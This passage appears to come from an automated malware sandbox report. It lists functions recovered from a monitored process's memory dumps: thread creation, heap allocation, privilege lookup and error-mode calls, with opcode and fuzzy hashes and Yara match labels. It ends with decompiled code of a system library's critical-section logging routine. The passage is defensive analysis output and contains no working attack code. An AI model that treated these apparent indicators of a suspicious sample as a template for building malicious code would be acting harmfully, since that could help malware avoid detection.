                                                                                    • Instruction Fuzzy Hash: B901B2B2200108BFCB54DF99DC80EEB77ADAF8C354F158258FA5DA7291C630E851CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01047010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0103CCD0,?,?), ref: 0104704C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
                                                                                    • Instruction ID: 0b72c4fb3a37eec4a359cc7ec1fce68d9578cc7d1d6d95ee1daabb762b2c6800
                                                                                    • Opcode Fuzzy Hash: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
                                                                                    • Instruction Fuzzy Hash: 0AE06D733912143BE23065999C42FE7B39C9B91B20F540036FB4DEB2C0D595F80142A8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01047003, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0103CCD0,?,?), ref: 0104704C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 57b41df7b6ded3c6ef72d6e8d63e713bb1bbfc4eae607ec5bd018a182b9a9725
                                                                                    • Instruction ID: 3490b759c53dbd2e967e38e4038c1754cc6ef160a116f6aa7e15e652e26d5d7a
                                                                                    • Opcode Fuzzy Hash: 57b41df7b6ded3c6ef72d6e8d63e713bb1bbfc4eae607ec5bd018a182b9a9725
                                                                                    • Instruction Fuzzy Hash: 25F02B733413007BE231A56C9C42FE3779C8F91B10F550179FB49BF2C0C5A9B84146A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01048490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(01043516,?,01043C8F,01043C8F,?,01043516,?,?,?,?,?,00000000,00000000,?), ref: 010484BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                    • Instruction ID: 1c9ae45d51b7d98dffaf604c1645083a8f98caaab88c41845bdd96b7b9643010
                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                    • Instruction Fuzzy Hash: 6FE046B1200208ABDB14EF99CC80EE777ACEF88650F118959FE485B241CA30F910CBF0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01048630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0103CFA2,0103CFA2,?,00000000,?,?), ref: 01048660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                    • Instruction ID: 5c55d8247ac477d179c1134d17b28f8f1cab95edfec5e990b41576d241cb94f5
                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                    • Instruction Fuzzy Hash: 2CE01AB12002086BDB10EF89CC84EE737ADAF88650F018565FA4857241C930E8108BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0103D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,01037C63,?), ref: 0103D43B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                    • Instruction ID: 510c157c96910100c11135bf3032085d7e08c0ee4a8abb423eccb72cdaa36716
                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                    • Instruction Fuzzy Hash: 7DD05E657503043BE610AAA89C02F6632CC6B54A00F894064FA899B2C3D950E4004561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0384967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e6eea77fc4f53da11b80000522f36c923002ef22dd9b991a2ee839f3435fbaf0
                                                                                    • Instruction ID: 254c02f8ada6b59e50a7f491ae0a1e3dd83409074f761687c2fad9712d20732c
                                                                                    • Opcode Fuzzy Hash: e6eea77fc4f53da11b80000522f36c923002ef22dd9b991a2ee839f3435fbaf0
                                                                                    • Instruction Fuzzy Hash: DBB09B719424C9C6D611D7E046087177904B7D0741F17C0D5E6024791A4778C4D5F5B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 0389FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 53%
                                                                                    			E0389FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0384CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03895720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03895720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                    0x0389fdda
                                                                                    0x0389fde2
                                                                                    0x0389fde5
                                                                                    0x0389fdec
                                                                                    0x0389fdfa
                                                                                    0x0389fdff
                                                                                    0x0389fe0a
                                                                                    0x0389fe0f
                                                                                    0x0389fe17
                                                                                    0x0389fe1e
                                                                                    0x0389fe19
                                                                                    0x0389fe19
                                                                                    0x0389fe19
                                                                                    0x0389fe20
                                                                                    0x0389fe21
                                                                                    0x0389fe22
                                                                                    0x0389fe25
                                                                                    0x0389fe40

                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0389FDFA
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0389FE01
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0389FE2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                    • API String ID: 885266447-3903918235
                                                                                    • Opcode ID: e0378ddd1dac3c51284c59ab16a57a8f460b3e494b14f2787e5596ba5ba352e1
                                                                                    • Instruction ID: 47f7b69a25ba76d1ed35de4015bb44239cf29d75e6b0b4803dc256ce8393d1df
                                                                                    • Opcode Fuzzy Hash: e0378ddd1dac3c51284c59ab16a57a8f460b3e494b14f2787e5596ba5ba352e1
                                                                                    • Instruction Fuzzy Hash: 9EF0FC762402017FEE259A85DC05F27BB5AEB45730F180355F724D95D1EA62F920C7F1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%